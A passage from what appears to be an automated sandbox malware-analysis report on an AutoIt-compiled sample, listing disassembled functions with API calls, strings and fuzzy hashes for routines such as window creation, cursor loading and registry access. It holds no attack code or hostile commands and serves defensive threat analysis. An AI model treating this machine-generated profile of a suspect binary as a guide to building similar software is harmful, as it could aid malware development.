                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                    • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                    • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                    • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                    Function 0426D670 Relevance: .1, Instructions: 92COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1246312059.000000000426A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0426A000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_426a000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                    • Instruction ID: c1261392caf82a663c7a787ebc2d1798c8cec0a44a29ff451cd5708f7cec006b
                                                    • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                    • Instruction Fuzzy Hash: FF41D371E1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB40
                                                    Function 0426D500 Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1246312059.000000000426A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0426A000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_426a000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                    • Instruction ID: 3a6f542258d66134d21e7d2a3b65a2842663b56ccd01493507a4e4ea35369a5d
                                                    • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                    • Instruction Fuzzy Hash: E8019278B2020DEFCB44DF98C5909AEF7B6FB48314F208599D819A7701E730AE81DB80
                                                    Function 0426D560 Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1246312059.000000000426A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0426A000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_426a000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                    • Instruction ID: f1fbe30b5510465ffcc4f90d3734ef5d7027a18623a0205f2fe49361355db6a6
                                                    • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                    • Instruction Fuzzy Hash: 71019278B20209EFCB44DF99C5909AEF7B6FB48314F208599D809A7741E730AE91DF80
                                                    Function 0426BEC0 Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1246312059.000000000426A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0426A000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_426a000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                    • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                    • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                    • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                    Function 004594E9 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 490filewindowcomCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DeleteObject.GDI32(?), ref: 0045953B
                                                    • DeleteObject.GDI32(?), ref: 00459551
                                                    • DestroyWindow.USER32(?), ref: 00459563
                                                    • GetDesktopWindow.USER32 ref: 00459581
                                                    • GetWindowRect.USER32(00000000), ref: 00459588
                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                    • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                    • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                    • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                    • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                    • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                    • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                    • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                    • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                    • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                    • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                    • ShowWindow.USER32(?,00000004), ref: 00459865
                                                    • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                    • GetStockObject.GDI32(00000011), ref: 004598CD
                                                    • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                    • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                    • DeleteDC.GDI32(00000000), ref: 004598F8
                                                    • _wcslen.LIBCMT ref: 00459916
                                                    • _wcscpy.LIBCMT ref: 0045993A
                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                    • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                    • GetDC.USER32(00000000), ref: 004599FC
                                                    • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                    • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                    • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                    • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                    • API String ID: 4040870279-2373415609
                                                    • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                    • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                    • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                    • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                    Function 004417BF Relevance: 49.8, APIs: 33, Instructions: 275COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSysColor.USER32(00000012), ref: 0044181E
                                                    • SetTextColor.GDI32(?,?), ref: 00441826
                                                    • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                    • GetSysColor.USER32(0000000F), ref: 00441849
                                                    • SetBkColor.GDI32(?,?), ref: 00441864
                                                    • SelectObject.GDI32(?,?), ref: 00441874
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                    • GetSysColor.USER32(00000010), ref: 004418B2
                                                    • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                    • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                    • DeleteObject.GDI32(?), ref: 004418D5
                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                    • FillRect.USER32(?,?,?), ref: 00441970
                                                      • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                      • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                      • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                      • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                      • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                      • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                      • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                      • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                      • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                      • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                      • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                      • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                      • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                    • String ID:
                                                    • API String ID: 69173610-0
                                                    • Opcode ID: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                    • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                    • Opcode Fuzzy Hash: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                    • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                    Function 004590BD Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DestroyWindow.USER32(?), ref: 004590F2
                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                    • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                    • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                    • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                    • GetStockObject.GDI32(00000011), ref: 004592AC
                                                    • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                    • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                    • DeleteDC.GDI32(00000000), ref: 004592D6
                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                    • GetStockObject.GDI32(00000011), ref: 004593D3
                                                    • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                    • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                    • API String ID: 2910397461-517079104
                                                    • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                    • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                    • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                    • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                    Function 00403A20 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                    • API String ID: 1038674560-3360698832
                                                    • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                    • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                    • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                    • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                    Function 00430737 Relevance: 43.6, APIs: 29, Instructions: 108COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                    • SetCursor.USER32(00000000), ref: 0043075B
                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                    • SetCursor.USER32(00000000), ref: 00430773
                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                    • SetCursor.USER32(00000000), ref: 0043078B
                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                    • SetCursor.USER32(00000000), ref: 004307A3
                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                    • SetCursor.USER32(00000000), ref: 004307BB
                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                    • SetCursor.USER32(00000000), ref: 004307D3
                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                    • SetCursor.USER32(00000000), ref: 004307EB
                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                    • SetCursor.USER32(00000000), ref: 00430803
                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                    • SetCursor.USER32(00000000), ref: 0043081B
                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                    • SetCursor.USER32(00000000), ref: 00430833
                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                    • SetCursor.USER32(00000000), ref: 0043084B
                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                    • SetCursor.USER32(00000000), ref: 00430863
                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                    • SetCursor.USER32(00000000), ref: 0043087B
                                                    • SetCursor.USER32(00000000), ref: 00430887
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                    • SetCursor.USER32(00000000), ref: 0043089F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Cursor$Load
                                                    • String ID:
                                                    • API String ID: 1675784387-0
                                                    • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                    • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                    • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                    • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                    Function 004308EF Relevance: 42.2, APIs: 28, Instructions: 200windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSysColor.USER32(0000000E), ref: 00430913
                                                    • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                    • GetSysColor.USER32(00000012), ref: 00430933
                                                    • SetTextColor.GDI32(?,?), ref: 0043093B
                                                    • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                    • GetSysColor.USER32(0000000F), ref: 00430959
                                                    • CreateSolidBrush.GDI32(?), ref: 00430962
                                                    • GetSysColor.USER32(00000011), ref: 00430979
                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                    • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                    • SetBkColor.GDI32(?,?), ref: 004309A6
                                                    • SelectObject.GDI32(?,?), ref: 004309B4
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                    • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                    • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                    • GetSysColor.USER32(00000011), ref: 00430A9F
                                                    • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                    • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                    • SelectObject.GDI32(?,?), ref: 00430AD0
                                                    • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                    • SelectObject.GDI32(?,?), ref: 00430AE3
                                                    • DeleteObject.GDI32(?), ref: 00430AE9
                                                    • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                    • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                    • String ID:
                                                    • API String ID: 1582027408-0
                                                    • Opcode ID: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                    • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                    • Opcode Fuzzy Hash: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                    • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                    Function 0046B9D7 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 415registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CloseConnectCreateRegistry
                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                    • API String ID: 3217815495-966354055
                                                    • Opcode ID: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                    • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                    • Opcode Fuzzy Hash: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                    • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                    Function 004565B2 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 291windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCursorPos.USER32(?), ref: 004566AE
                                                    • GetDesktopWindow.USER32 ref: 004566C3
                                                    • GetWindowRect.USER32(00000000), ref: 004566CA
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                    • DestroyWindow.USER32(?), ref: 00456746
